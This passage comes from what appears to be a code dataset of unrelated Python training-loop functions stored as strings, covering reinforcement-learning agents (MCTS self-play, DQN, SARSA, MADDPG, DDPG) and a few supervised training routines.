self.pnet, self.args)\n\n self.nnet.train(trainExamples)\n nmcts = MCTS(self.game, self.nnet, self.args)\n\n print('PITTING AGAINST PREVIOUS VERSION')\n arena = Arena(lambda x: np.argmax(pmcts.getActionProb(x, temp=0)),\n lambda x: np.argmax(nmcts.getActionProb(x, temp=0)), self.game,nmcts,pmcts,evaluate=True)\n\n pwins, nwins, draws = arena.playGames(self.args.arenaCompare, False)\n\n pmcts.clear()\n nmcts.clear()\n del pmcts\n del nmcts\n\n print(' ')\n print('NEW/PREV WINS : %d / %d ; DRAWS : %d' % (nwins, pwins, draws))\n if i == 1:\n epochswin.append(pwins)\n epochdraw.append(0)\n\n epochswin.append(nwins)\n epochdraw.append(draws)\n self.writeLogsToFile(epochswin, epochdraw)\n\n ''' Get all the players and then pit them against the network. You need to modify here if you implement \n more players\n '''\n (gp, rp, mp) = self.decidePlayers()\n\n if self.args.parallel == 0:\n\n\n nmcts1 = MCTS(self.game, self.nnet, self.args)\n nmcts2 = MCTS(self.game, self.nnet, self.args)\n nmcts3 = MCTS(self.game, self.nnet, self.args)\n\n arenagreedy = Arena(lambda x: np.argmax(nmcts1.getActionProb(x, temp=0)), gp, self.game,nmcts1)\n arenarandom = Arena(lambda x: np.argmax(nmcts2.getActionProb(x, temp=0)), rp, self.game,nmcts2)\n arenaminmax = Arena(lambda x: np.argmax(nmcts3.getActionProb(x, temp=0)), mp, self.game,nmcts3,evaluate=True)\n\n pwinsminmax, nwinsminmax, drawsminmax = arenaminmax.playGames(self.args.arenaCompare)\n print(\"minmax - \"+str(pwinsminmax)+\" \"+str(nwinsminmax)+\" \"+str(drawsminmax))\n pwinsgreedy, nwinsgreedy, drawsgreedy = arenagreedy.playGames(self.args.arenaCompare)\n print(\"greedy - \"+str(pwinsgreedy)+\" \"+str(nwinsgreedy)+\" \"+str(drawsgreedy))\n pwinsreandom, nwinsrandom, drawsrandom = arenarandom.playGames(self.args.arenaCompare)\n print(\"random - \"+str(pwinsreandom)+\" \"+str(nwinsrandom)+\" \"+str(drawsrandom))\n\n nmcts1.clear()\n nmcts2.clear()\n nmcts3.clear()\n del nmcts1\n del nmcts2\n del nmcts3\n\n else:\n '''\n This will be used if you want to evaluate the network against the benchmarks in a parallel way\n '''\n\n self.args.update({'index': str(i)})\n\n p = self.parallel(self.args.arenaCompare)\n (pwinsminmax, nwinsminmax, drawsminmax) = p[0] # self.parallel(\"minmax\", self.args.arenaCompare)\n (pwinsgreedy, nwinsgreedy, drawsgreedy) = p[1] # self.parallel(\"greedy\",self.args.arenaCompare)\n (pwinsreandom, nwinsrandom, drawsrandom) = p[2] # self.parallel(\"random\",self.args.arenaCompare)\n\n epochsdrawgreedy.append(drawsgreedy)\n epochsdrawrandom.append(drawsrandom)\n epochswinrandom.append(pwinsreandom)\n epochswingreedy.append(pwinsgreedy)\n epochswinminmax.append(pwinsminmax)\n epochsdrawminmax.append(drawsminmax)\n\n self.writeLogsToFile(epochswingreedy, epochsdrawgreedy, epochswinrandom, epochsdrawrandom, epochswinminmax,\n epochsdrawminmax, training=False)\n\n if pwins + nwins == 0 or float(nwins) / (pwins + nwins) <= self.args.updateThreshold:\n print('REJECTING NEW MODEL')\n filename = \"curent\"+str(i)+\"temp:iter\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n filenameBest = \"best\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n exists = os.path.isfile(filenameBest)\n if exists:\n self.nnet.load_checkpoint(folder=self.args.checkpoint, filename=filenameBest)\n else:\n self.nnet.load_checkpoint(folder=self.args.checkpoint, filename=filename)\n\n else:\n print('ACCEPTING NEW MODEL')\n\n filename = \"best\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=self.getCheckpointFile(i))\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=filename)\n self.mcts.clear()\n del self.mcts\n self.mcts = MCTS(self.game, self.nnet, self.args, mcts=True) # reset search tree\n print(self.tracker.print_diff())\n self.writeLogsToFile(epochswin, epochdraw, training=True)", "def train_one_epoch(self):\n raise NotImplementedError", "def train_on_history(self, history):\n \n # Split into episodes\n n_episodes = history[-1][\"episode\"] \n episodes = [list(filter(lambda h: h[\"episode\"]==e , history)\n ) for e in range(n_episodes)\n ]\n\n # Split into game lives\n for episode in episodes:\n \n \n game_lives = [\n list(filter(lambda h: h.get('info').get('ale.lives')==l, episode)\n ) for l in range(5)\n ]\n \n for life in game_lives:\n if life:\n self.train(life)\n else:\n print(\"No ocurrance\")\n return", "def train(self,env, iter_n=2000):\n\n\t\tfor i in range(iter_n):\n\t\t\tif i > 50:\n\t\t\t\tif all(reward > 195 for reward in self.step_count[-10:]):\n\t\t\t\t\tprint('solved at episode {}'.format(i))\n\t\t\t\t\tbreak\n\t\t\tstate = self.env.reset()\n\t\t\tstate = np.reshape(state, [1, self.state_size])\n\n\t\t\tepisode_complete = False\n\t\t\tstep = 0\n\t\t\twhile not episode_complete and (step < self.max_steps):\n\t\t\t\taction = self.define_action(state)\n\t\t\t\tnew_state, reward, episode_complete, info = env.step(action)\n\t\t\t\tnew_state = np.reshape(new_state, [1, self.state_size])\n\n\t\t\t\tself.memory.append((state, action, reward, new_state, episode_complete))\n\t\t\t\tself.round_reward += reward\n\t\t\t\tstate = new_state\n\t\t\t\tstep += 1\n\t\t\t\tif episode_complete:\n\t\t\t\t\tself.round_reward += -10\n\t\t\t\t\tself.update_target_model()\n\t\t\t\t\tself.print_results(i, iter_n, step)\n\t\t\t\t\tif i != 0: # Update totals in memory if not the first run\n\t\t\t\t\t\tself.update_totals(i, step)\n\t\t\t\tif len(self.memory) > self.training_iter:\n\t\t\t\t\tself.replay()\n\t\t\tif self.epsilon > self.epsilon_min:\n\t\t\t\tself.epsilon *= self.epsilon_decay\n\n\t\treturn self.all_iterations, self.all_rewards, self.step_count", "def train_one_eps(self, env, horizon=1000, lr=0.1):\n\t\tr_ep = 0 # variable to track episode \n\t\tep_len = 0\n\n\t\tstate = env.reset()\n\t\taction = self.select_action(state)\n\n\t\tfor t in range(horizon):\n\t\t\t\n\t\t\tstate2, r, done, _ = env.step(action)\n\t\t\tep_len = ep_len + 1\n\t\t\tr_ep += r\n\n\t\t\taction2 = self.select_action(state2)\n\t\t\tself.update(state, action, r, state2, action2, lr=lr)\n\t\t\taction = action2\n\t\t\t\n\t\t\tif(done):\n\t\t\t\tbreak\n\t\t\tstate = state2\n\n\t\treturn r_ep, ep_len", "def train_epoch(self):\n for batch, targets in self.training_dataloader:\n self.training_step(batch, targets)\n self.calculate_training_loss()\n self.epochs_trained += 1\n LOGGER.info(\n \"Training loss after {} epochs: {}\".format(str(self.epochs_trained), str(self.training_average_loss))\n )", "def fit(self):\n for i in range(self.current_epoch, self.max_epoch):\n self.current_epoch += 1\n # train\n train_dataloader = self.data_module.get_train_dataloader(\n batch_size=self.train_batch_size, \n shuffle=self.train_dataloader_shuffle, \n num_workers=self.dataloader_num_workers,\n pin_memory=True\n )\n neptune.log_metric(\"learning_rate_vs_epoch\", self.optimizer.param_groups[0]['lr'])\n self.train_one_epoch(train_dataloader)\n\n # validate \n if self.validate_after == 'epoch' and self.train_on_all_data == False and self.run_lr_range_test == False:\n validation_dataloader = self.data_module.get_valid_dataloader(\n batch_size=self.valid_batch_size, \n shuffle=self.train_dataloader_shuffle, \n num_workers=self.dataloader_num_workers, \n pin_memory=True\n )\n self.validate_one_epoch(validation_dataloader)\n\n if self.scheduler:\n if self.step_scheduler_after == 'epoch': \n if self.step_scheduler_metric == 'val_auc':\n self.scheduler.step(self.metrics['valid'][-1]['auc_score'])\n else:\n self.scheduler.step()\n\n if self.run_lr_range_test:\n neptune.log_metric('validation_epoch_end_AUC_vs_LR', \n self.scheduler.get_last_lr()[0], y=self.metrics['valid'][-1]['auc_score'])\n\n # checkpoint model for resuming model\n if (self.current_epoch % self.checkpoint_epochs) == 0:\n self.save_checkpoint()\n\n # sleep the training process\n if self.current_epoch % self.sleep_in_epochs == 0:\n print(f\"SLEEPING FOR {self.sleep_time} at epoch={self.current_epoch}\")\n for i in range(int(self.sleep_time/30)):\n time.sleep(i)\n neptune.log_metric(\"sleeping_status\", y=1)\n\n stop_training = self.stopping_criteria()\n if stop_training:\n if self.fp16:\n self.scaler.step(self.optimizer)\n self.scaler.update()\n self.optimizer.zero_grad()\n else:\n self.optimizer.step()\n self.optimizer.zero_grad()\n # backward all the accumulate gradients\n print(f\"stopped training at {self.current_epoch} epoch\")\n break", "def _sp_train(self, max_steps, instances, visualize, plot):\n # Keep track of rewards per episode per instance\n episode_reward_sequences = [[] for i in range(instances)]\n episode_step_sequences = [[] for i in range(instances)]\n episode_rewards = [0] * instances\n\n # Create and initialize environment instances\n envs = [self.create_env() for i in range(instances)]\n envs[0].render(mode='human')\n states = [env.reset()['observation'][0] for env in envs] # get the image\n\n for step in range(max_steps):\n for i in range(instances):\n if visualize: envs[i].render()\n action, angle_index, action_index = self.agent.act(states[i], i)\n\n next_state, reward, done, _ = envs[i].step(action)\n (next_image, next_depth) = next_state['observation']\n self.agent.push(\n Transition(states[i], [angle_index, action_index], reward, None if done else next_image), i)\n episode_rewards[i] += reward\n if done:\n episode_reward_sequences[i].append(episode_rewards[i])\n episode_step_sequences[i].append(step)\n episode_rewards[i] = 0\n if plot: plot(episode_reward_sequences, episode_step_sequences)\n (image, depth) = envs[i].reset()['observation']\n states[i] = image\n else:\n states[i] = next_image\n # Perform one step of the optimization\n self.agent.train(step)\n\n if plot: plot(episode_reward_sequences, episode_step_sequences, done=True)", "def train_models(self):\n\n #keep track on the number of iterations (needed to scale lambda)\n nr_iteration = 0\n \n for epoch in range(self.epochs):\n start = time.time()\n print()\n print(epoch + 1)\n print()\n for step, batch in enumerate(self.training_data):\n X_batch = normalize_images(tf.cast(batch[0], 'float32'))\n Y_batch = batch[1]\n Z_batch = self.ae_model.encode(X_batch)\n \n self.train_step_disc(Z_batch, Y_batch)\n # Call only one tf.function when tracing.\n #ADD LAMBDA SCHEDULE ACCORDING TO OUR EXPERIMENTS AND EPOCH LENGTH\n self.scale_lambda(self.lambda_e, nr_iteration)\n self.train_step_ae(X_batch, Y_batch, Z_batch)\n\n nr_iteration += 1\n end = time.time()\n print(\"Epoch \" + str(epoch + 1) + \" takes \" + str(end - start))", "def getTrainEpisodes(self):\n print(\"Do you want to train the IA?\")\n while True:\n num_episodes = raw_input(\"Type number iterations to train, [0] to not train: \")\n try:\n if int(num_episodes) >= 0:\n return int(num_episodes)\n print(\"Invalid input, try again\")\n except:\n print(\"Invalid input, try again\")\n return", "def train(self):\n tic = time.time()\n means = []\n stds = []\n steps = 0\n scores_window = deque(maxlen=100)\n for e in range(1,self.episodes):\n\n self.noise.step()\n episode_scores = []\n obs = self.env.reset()\n for t in range(self.tmax):\n actions = self.act(obs)\n next_obs,rewards,dones = self.env.step(actions)\n\n # Store experience\n if np.max(rewards) > 0:\n print('hit the ball over the net',rewards)\n self.R.add(obs.reshape(1,48),obs,actions,rewards,next_obs.reshape(1,48),next_obs,dones)\n obs = next_obs\n # Score tracking\n episode_scores.append(np.max(rewards))\n \n # Learn\n if len(self.R) > self.min_buffer_size:\n for _ in range(self.SGD_epoch):\n # Update each agent\n for i in range(self.num_agents):\n self.learn(i)\n # update target networks\n self.update_targets_all()\n \n steps += int(t)\n means.append(np.mean(episode_scores))\n stds.append(np.std(episode_scores))\n scores_window.append(np.sum(episode_scores))\n if e % 4 == 0:\n toc = time.time()\n r_mean = np.mean(scores_window)\n r_max = max(scores_window)\n r_min = min(scores_window)\n r_std = np.std(scores_window)\n plot(self.name,means,stds)\n print(\"\\rEpisode: {} out of {}, Steps {}, Rewards: mean {:.2f}, min {:.2f}, max {:.2f}, std {:.2f}, Elapsed {:.2f}\".format(e,self.episodes,steps,r_mean,r_min,r_max,r_std,(toc-tic)/60))\n if np.mean(scores_window) > self.winning_condition:\n print('Env solved!')\n # save scores\n pickle.dump([means,stds], open(str(self.name)+'_scores.p', 'wb'))\n # save policy\n self.save_weights(self.critic_path,self.actor_path)\n break", "def setup_training(self):\n print('setup training called')\n self.steps_done = 0\n self.current_episode_num = 1\n self.total_reward = 0\n\n # self.optimizer = optim.RMSprop(policy_net.parameters())\n self.memory = ReplayMemory(300000)\n self.total_reward_history = []\n # self.loss_history = []\n self.positions = []\n self.n_destroyed_crates = 0\n self.is_in_bomb_range = False", "def train_step(self):\n pass", "def train(self, x, t):\n for i in range(self.number_model):\n curr_model = self.all_model[i]\n curr_model.fit(x, t)", "def train(self):\n total_steps = 0\n scores_history = [deque(maxlen=self.run_settings.averaging_window)\n for a in range(len(self.agents))]\n averages_history = [[] for a in range(len(self.agents))]\n\n for e in range(self.run_settings.num_episodes):\n # Initialize episode\n try:\n env_states, rewards, done, metainfo = self.custom_env.reset()\n except EpisodeCrashException:\n for a in range(len(self.agents)):\n if hasattr(self.agents[a], 'notify_episode_crashed'):\n self.agents[a].notify_episode_crashed(self.run_settings)\n continue\n\n # Initialize scores to starting reward (probably 0)\n scores = rewards\n step = 0\n\n while not done:\n states = [self.agents[a].state_space_converter(env_states[a])\n for a in range(len(self.agents))]\n\n # Train agents\n if total_steps > 0 and total_steps % self.run_settings.train_every == 0:\n for agent in self.agents:\n agent.train(self.run_settings)\n\n # Save agent model\n if total_steps > 0 and total_steps % self.run_settings.save_every == 0:\n for agent in self.agents:\n agent.save()\n\n # Get actions\n actions = [self.agents[a].sample(states[a])\n for a in range(len(self.agents))]\n env_actions = [self.agents[a].action_space_converter(actions[a])\n for a in range(len(self.agents))]\n # Take environment step\n try:\n env_states, rewards, done, metainfo = self.custom_env.step(env_actions)\n except EpisodeCrashException:\n for a in range(len(self.agents)):\n if hasattr(self.agents[a], 'notify_episode_crashed'):\n self.agents[a].notify_episode_crashed(self.run_settings)\n break\n step += 1\n total_steps += 1\n\n # Update scores\n scores = [scores[a] + rewards[a] for a in range(len(self.agents))]\n # Push to agent Memories\n for a in range(len(self.agents)):\n self.agents[a].push_memory(states[a], actions[a], rewards[a], done)\n\n if done:\n averages = []\n for a in range(len(scores_history)):\n scores_history[a].append(scores[a])\n averages.append(np.mean(scores_history[a]))\n averages_history[a].append(averages[a])\n\n if len(scores) == 1:\n scores = scores[0]\n averages = averages[0]\n if self.run_settings.verbose:\n print(\"Game {} ended after {} steps. Game score: {}. Averages: {}\"\n .format(e+1, step, scores, averages))\n if (self.run_settings.graph_every > 0 and e > 0\n and e % self.run_settings.graph_every == 0):\n self.plot_results(averages_history)", "def training(self) -> None:\n self.compile_model()\n self.train_epoch()\n self.agent.save()", "def train_dqn(self, n_episodes=2000, max_t=1000, eps_start=1.0, eps_end=0.01, eps_decay=0.995):\n self.scores = [] # list containing scores from each episode\n scores_window = deque(maxlen=100) # last 100 scores\n eps = eps_start # initialize epsilon\n for i_episode in range(1, n_episodes+1):\n env_info = self.env.reset(train_mode=True)[self.brain_name] # reset the environment\n state = env_info.vector_observations[0] # get the current state\n score = 0 # initialize the score\n for t in range(max_t):\n action = self.agent.act(state, eps)\n env_info = self.env.step(action)[self.brain_name] # send the action to the environment\n next_state = env_info.vector_observations[0] # get the next state\n reward = env_info.rewards[0] # get the reward\n done = env_info.local_done[0] # see if episode has finished\n self.agent.step(state, action, reward, next_state, done)\n state = next_state\n score += reward\n if done:\n break \n scores_window.append(score) # save most recent score\n self.scores.append(score) # save most recent score\n eps = max(eps_end, eps_decay*eps) # decrease epsilon\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)), end=\"\")\n if i_episode % 100 == 0:\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)))\n # we use 15.0 just to be sure\n if np.mean(scores_window)>=self.threshold:\n print('\\nEnvironment solved in {:d} episodes!\\tAverage Score: {:.2f}'.format(i_episode-100, np.mean(scores_window)))\n break\n return self.scores", "def train_agent(\n self,\n *,\n env,\n test_env,\n save_name,\n train_every=1,\n max_episodes=1000,\n center_returns=True,\n render=True,\n ):\n\n agent = self.create_agent(env)\n\n for episode in range(1, max_episodes + 1):\n obs = env.reset()\n done = False\n\n episode_return = 0.0\n while not done:\n action = agent.act(obs, deterministic=False)\n next_obs, reward, done, _ = env.step(action)\n episode_return += reward\n agent.store_step(obs, action, reward, next_obs, done)\n obs = next_obs\n\n if render:\n env.render()\n\n if episode % train_every == 0:\n agent.perform_training(\n gamma=self.gamma, center_returns=center_returns\n )\n torch.save(agent, f\"saved_agents/{save_name}\")\n\n print(\"Episode {} -- return={}\".format(episode, episode_return))\n return agent", "def train(\n env: DiscreteEnvironment[TState, TAction],\n agent: DiscreteAgent[TState, TAction],\n n_episodes: int,\n on_action: Callable[[TState, TAction, float, int], None] = None,\n on_episode_end: Callable[[int], None] = None,\n) -> None:\n for ep in range(n_episodes):\n t = 0\n while not env.terminated:\n s, a, r = agent.act_and_train(t) # returns (S_t, A_t, R_t)\n if on_action:\n on_action(s, a, r, t)\n t += 1\n agent.episode_end()\n if on_episode_end:\n on_episode_end(t)\n env.reset()", "def train(cls,\n training,\n pdf_model,\n t_x,\n t_y):\n batch_size, num_epochs, num_episodes, samples, max_noise, min_noise = training()\n\n h_l = None\n h_vl = None\n\n idx = np.arange(cls.test_set_size)\n np.random.shuffle(idx)\n idx = idx[:samples]\n\n s_x = t_x[idx]\n s_y = t_y[idx]\n for i in range(0, num_episodes):\n print('>>>>>')\n print('EPISODE: ' + str(i))\n if max_noise > 0:\n sp = np.shape(s_y)\n s_y_r = np.random.rand(sp[0], sp[1])\n s_y_n = s_y * s_y_r * cls.noise_factor(epoch=i,\n max_epoch=num_episodes,\n max_noise=max_noise,\n min_noise=min_noise)\n s_y_n = s_y + ((s_y / 2.0) - s_y_n)\n\n history = pdf_model.fit(s_x,\n s_y_n,\n epochs=num_epochs,\n batch_size=batch_size,\n shuffle=True,\n validation_split=0.15,\n verbose=2\n )\n hl = history.history['loss']\n hv = history.history['val_loss']\n if h_l is None:\n h_l = hl\n h_vl = hv\n else:\n h_l = h_l + hl\n h_vl = h_vl + hv\n\n _p = np.zeros((1, cls.action_size))\n _p[0] = s_x[0]\n pr = model.predict(_p)\n cls.kld(s_y[0], pr)\n print('<<<<<')\n\n cls.plot_results(h_l, h_vl, (num_epochs * (i + 1)))\n cls.save_hist(history)\n return", "def fit(self, num_iterations, max_episode_length=250, eval_every_nth=1000, save_model_every_nth=1000, log_loss_every_nth=1000, video_every_nth=20000):\n self.compile()\n self.policy = LinearDecayGreedyEpsilonPolicy(start_value=1., end_value=0.1, num_steps=1e6, num_actions=self.num_actions) # for training\n self.replay_memory = ReplayMemory(max_size=1000000)\n self.log_loss_every_nth = log_loss_every_nth\n random_policy = UniformRandomPolicy(num_actions=self.num_actions) # for burn in \n num_episodes = 0\n\n # tf logging\n self.tf_session = K.get_session()\n self.tf_summary_writer = tf.summary.FileWriter(self.log_dir, self.tf_session.graph)\n\n while self.iter_ctr < num_iterations:\n state = self.env.reset()\n self.preprocessor.reset_history_memory()\n\n num_timesteps_in_curr_episode = 0\n total_reward_curr_episode = 0 \n\n while num_timesteps_in_curr_episode < max_episode_length:\n self.iter_ctr+=1 # number of steps overall\n num_timesteps_in_curr_episode += 1 # number of steps in the current episode\n\n # logging\n # if not self.iter_ctr % 1000:\n # print \"iter_ctr {}, num_episodes : {} num_timesteps_in_curr_episode {}\".format(self.iter_ctr, num_episodes, num_timesteps_in_curr_episode)\n\n # this appends to uint8 history and also returns stuff ready to be spit into the network\n state_network = self.preprocessor.process_state_for_network(state) #shape is (4,84,84,1). axis are swapped in cal_q_vals\n # print \"shape {}, max {}, min {}, type {} \".format(state_network.shape, np.max(state_network), np.min(state_network), state_network.dtype)\n\n # burning in \n if self.iter_ctr < self.num_burn_in:\n action = random_policy.select_action() # goes from 0 to n-1\n next_state, reward, is_terminal, _ = self.env.step(action)\n reward_proc = self.preprocessor.process_reward(reward)\n total_reward_curr_episode += reward_proc\n state_proc_memory = self.preprocessor.process_state_for_memory(state)\n # atari_preprocessor.process_state_for_memory converts it to grayscale, resizes it to (84, 84) and converts to uint8\n self.replay_memory.append(state_proc_memory, action, reward_proc, is_terminal)\n\n if is_terminal or (num_timesteps_in_curr_episode > max_episode_length-1):\n state = self.env.reset()\n num_episodes += 1\n with tf.name_scope('summaries'):\n self.tf_log_scaler(tag='train_reward_per_episode_wrt_no_of_episodes', value=total_reward_curr_episode, step=num_episodes)\n self.tf_log_scaler(tag='train_reward_per_episode_wrt_iterations', value=total_reward_curr_episode, step=self.iter_ctr)\n print \"iter_ctr {}, num_episodes : {}, episode_reward : {}, loss : {}, episode_timesteps : {}, epsilon : {}\".format\\\n (self.iter_ctr, num_episodes, total_reward_curr_episode, self.loss_last, num_timesteps_in_curr_episode, self.policy.epsilon)\n num_timesteps_in_curr_episode = 0\n self.dump_train_episode_reward(total_reward_curr_episode)\n # this should be called when num_timesteps_in_curr_episode > max_episode_length, but we can call it in is_terminal as well. \n # it won't change anything as it just sets the last entry's is_terminal to True\n self.replay_memory.end_episode() \n break\n\n # training\n else:\n # print \"iter_ctr {}, num_episodes : {} num_timesteps_in_curr_episode {}\".format(self.iter_ctr, num_episodes, num_timesteps_in_curr_episode)\n q_values = self.calc_q_values(state_network)\n # print \"q_values {} q_values.shape {}\".format(q_values, q_values.shape)\n #print \"q_values.shape \", q_values.shape\n action = self.policy.select_action(q_values=q_values, is_training=True)\n next_state, reward, is_terminal, _ = self.env.step(action)\n reward_proc = self.preprocessor.process_reward(reward)\n total_reward_curr_episode += reward_proc\n state_proc_memory = self.preprocessor.process_state_for_memory(state)\n self.replay_memory.append(state_proc_memory, action, reward_proc, is_terminal)\n\n # validation. keep this clause before the breaks!\n if not(self.iter_ctr%eval_every_nth):\n print \"\\n\\nEvaluating at iter {}\".format(self.iter_ctr)\n if not(self.iter_ctr%video_every_nth):\n self.evaluate(num_episodes=20, max_episode_length=max_episode_length, gen_video=True)\n else:\n self.evaluate(num_episodes=20, max_episode_length=max_episode_length, gen_video=False)\n print \"Done Evaluating\\n\\n\"\n\n # save model\n if not(self.iter_ctr%save_model_every_nth):\n self.q_network.save(os.path.join(self.log_dir, 'weights/q_network_{}.h5'.format(str(self.iter_ctr).zfill(7))))\n\n if is_terminal or (num_timesteps_in_curr_episode > max_episode_length-1):\n state = self.env.reset()\n num_episodes += 1\n with tf.name_scope('summaries'):\n self.tf_log_scaler(tag='train_reward_per_episode_wrt_no_of_episodes', value=total_reward_curr_episode, step=num_episodes)\n self.tf_log_scaler(tag='train_reward_per_episode_wrt_iterations', value=total_reward_curr_episode, step=self.iter_ctr)\n print \"iter_ctr {}, num_episodes : {}, episode_reward : {}, loss : {}, episode_timesteps : {}, epsilon : {}\".format\\\n (self.iter_ctr, num_episodes, total_reward_curr_episode, self.loss_last, num_timesteps_in_curr_episode, self.policy.epsilon)\n num_timesteps_in_curr_episode = 0\n self.dump_train_episode_reward(total_reward_curr_episode)\n self.replay_memory.end_episode() \n break\n\n if not(self.iter_ctr % self.train_freq):\n self.update_policy()\n\n state = next_state", "def agents_train(self, game_step, episode_now, args):\n # update all trainers, if not in display or benchmark mode\n if episode_now < args.learning_start_episode: return \n if self.update_cnt > 0 and self.var >= self.min_var: self.var *= args.var_discount\n #if episode_now > self.last_update_episode and (episode_now - args.learning_start_episode) % args.learning_fre == 0:\n if game_step % args.learning_fre_step == 0:\n if self.update_cnt == 0: print('\\r=start training ...'+' '*100)\n self.last_update_episode = episode_now\n self.update_cnt += 1\n\n # update every agent in different memory batch\n for agent_idx, (actor_c, actor_t, critic_c, critic_t, opt_a, opt_c) in \\\n enumerate(zip(self.actors_cur, self.actors_tar, self.critics_cur, \\\n self.critics_tar, self.optimizers_a, self.optimizers_c)):\n # del if opt_c == None: continue # jump to the next model update\n\n # sample the experience\n _obs_n_o, _action_n, _rew_n, _obs_n_n, _done_n = self.memory.sample( \\\n args.batch_size, agent_idx) # Note_The func is not the same as others\n \n # --use the date to update the CRITIC\n rew = torch.tensor(_rew_n, device=args.device, dtype=torch.float) # set the rew to gpu\n done_n = torch.tensor(~_done_n, dtype=torch.float, device=args.device) # set the rew to gpu\n action_cur_o = torch.from_numpy(_action_n).to(args.device, torch.float)\n obs_n_o = torch.from_numpy(_obs_n_o).to(args.device, torch.float)\n obs_n_n = torch.from_numpy(_obs_n_n).to(args.device, torch.float)\n\n action_tar = torch.cat([a_t(obs_n_n[:, self.obs_size[idx][0]:self.obs_size[idx][1]]).detach() \\\n for idx, a_t in enumerate(self.actors_tar)], dim=1)\n q = critic_c(obs_n_o, action_cur_o).reshape(-1) # q \n q_ = critic_t(obs_n_n, action_tar).reshape(-1) # q_ \n q_ = q_*args.gamma*done_n + rew*torch.tensor(args.reward_scale_par, device=args.device) # q_*gamma*done + reward\n loss_c = torch.nn.MSELoss()(q, q_.detach()) # bellman equation\n opt_c.zero_grad()\n loss_c.backward()\n nn.utils.clip_grad_norm_(critic_c.parameters(), args.max_grad_norm)\n opt_c.step()\n\n # --use the data to update the ACTOR\n # There is no need to cal other agent's action\n opt_c.zero_grad()\n model_out, policy_c_new = actor_c( \\\n obs_n_o[:, self.obs_size[agent_idx][0]:self.obs_size[agent_idx][1]], model_original_out=True)\n # update the aciton of this agent\n action_cur_o[:, self.action_size[agent_idx][0]:self.action_size[agent_idx][1]] = policy_c_new \n loss_pse = torch.mean(torch.pow(model_out, 2))\n loss_a = torch.mul(torch.tensor(-1.0, device=args.device), torch.mean(critic_c(obs_n_o, action_cur_o)))\n\n opt_a.zero_grad()\n (2e-3*loss_pse+loss_a).backward()\n #loss_a.backward()\n nn.utils.clip_grad_norm_(actor_c.parameters(), args.max_grad_norm)\n opt_a.step()\n\n # save the model to the path_dir ---cnt by update number\n #if self.update_cnt > args.start_save_model and self.update_cnt % args.fre4save_model == 0:\n if self.update_cnt > args.start_save_model and self.update_cnt % args.fre4save_model_step == 0:\n time_now = time.strftime('%y%m_%d%H%M')\n print('=time:{} step:{} save'.format(time_now, game_step))\n model_file_dir = os.path.join(args.save_dir, '{}_{}_{}'.format( \\\n args.scenario_name, time_now, game_step))\n if not os.path.exists(model_file_dir): # make the path\n os.mkdir(model_file_dir)\n for agent_idx, (a_c, a_t, c_c, c_t) in \\\n enumerate(zip(self.actors_cur, self.actors_tar, self.critics_cur, self.critics_tar)):\n torch.save(a_c, os.path.join(model_file_dir, 'a_c_{}.pt'.format(agent_idx)))\n torch.save(a_t, os.path.join(model_file_dir, 'a_t_{}.pt'.format(agent_idx)))\n torch.save(c_c, os.path.join(model_file_dir, 'c_c_{}.pt'.format(agent_idx)))\n torch.save(c_t, os.path.join(model_file_dir, 'c_t_{}.pt'.format(agent_idx)))\n\n # update the tar par\n self.actors_tar = self.update_trainers(self.actors_cur, self.actors_tar, args.tao) \n self.critics_tar = self.update_trainers(self.critics_cur, self.critics_tar, args.tao)", "def trainNet():", "def train(self):\n if len(self.experience) < self.minibatch_size:\n return\n\n # sample a minibatch_size of random episode with a number of transitions >= unrollings_num\n random_episodes_indecies = np.random.choice(len(self.experience), self.minibatch_size)\n random_episodes = []\n for index in random_episodes_indecies:\n episode = self.experience[index]\n\n # 0:random_transitions_space is the range from which a random transition\n # can be picked up while having unrollings_num - 1 transitions after it\n random_transitions_space = len(episode) - self.unrollings_num\n random_start = np.random.choice(random_transitions_space, 1)\n\n random_episodes.append(episode[random_start:random_start + self.unrollings_num])\n\n state_shape = tuple([self.minibatch_size, self.unrollings_num] + self.state_shape)\n\n # prepare the training data\n states = np.empty(state_shape, dtype=np.float32)\n next_states = np.empty(state_shape, dtype=np.float32)\n rewards = np.empty((self.minibatch_size, self.unrollings_num, ), dtype=np.float32)\n transition_action_filters = np.zeros((self.minibatch_size, self.unrollings_num, self.actions_count), dtype=np.float32)\n next_legal_actions_filters = np.zeros((self.minibatch_size, self.unrollings_num, self.actions_count), dtype=np.float32)\n\n for i, episode in enumerate(random_episodes):\n for j, transition in enumerate(episode):\n state, action, reward, nextstate, next_legal_actions = transition\n\n states[i,j], rewards[i,j], next_states[i,j] = state, reward, nextstate\n transition_action_filters[i,j][action] = 1.0\n next_legal_actions_filters[i,j][next_legal_actions] = 1.0\n\n self.prediction_nn.clearLSTMS(self.session)\n self.target_nn.clearLSTMS(self.session)\n\n loss,_ = self.session.run([self.loss, self.finalize], {\n self.states: states,\n self.next_states: next_states,\n self.rewards: np.reshape(rewards, (self.minibatch_size * self.unrollings_num, )),\n self.transition_action_filters: np.reshape(transition_action_filters, (self.minibatch_size * self.unrollings_num, self.actions_count)),\n self.next_legal_actions_filters: np.reshape(next_legal_actions_filters, (self.minibatch_size * self.unrollings_num, self.actions_count))\n })\n\n if self.iteration != 0 and self.iteration % self.freeze_period == 0:\n self.target_nn.assign_to(self.prediction_nn, self.session)\n\n self.iteration += 1\n\n return loss, self.iteration", "def train_SN(model, optimizer, scheduler, episodes=1):\n model = model.to(device=device) # move the model parameters to CPU/GPU\n for episode in range(episodes):\n scheduler.step(episode)\n model.train() # set to train mode\n\n # make the samplers \n # make 2 samplers, one for the \"sample/training set\" of a one-shot classifier\n # other sampler is for the \"query/test set\" which provides many comparisons\n train_sample_sampler = SampleSampler(num_cl=NUM_CL)\n sampled_classes = train_sample_sampler.cl_list\n sampled_examples = train_sample_sampler.ex_list\n train_query_sampler = QuerySampler(sampled_classes, sampled_examples, num_inst=NUM_EX)\n\n # make the dataloaders\n s_batch_num = 1 # one shot \"training\" each\n q_batch_num = NUM_EX # pair up number of examples per class in a batch (default 19)\n train_sample_loader = 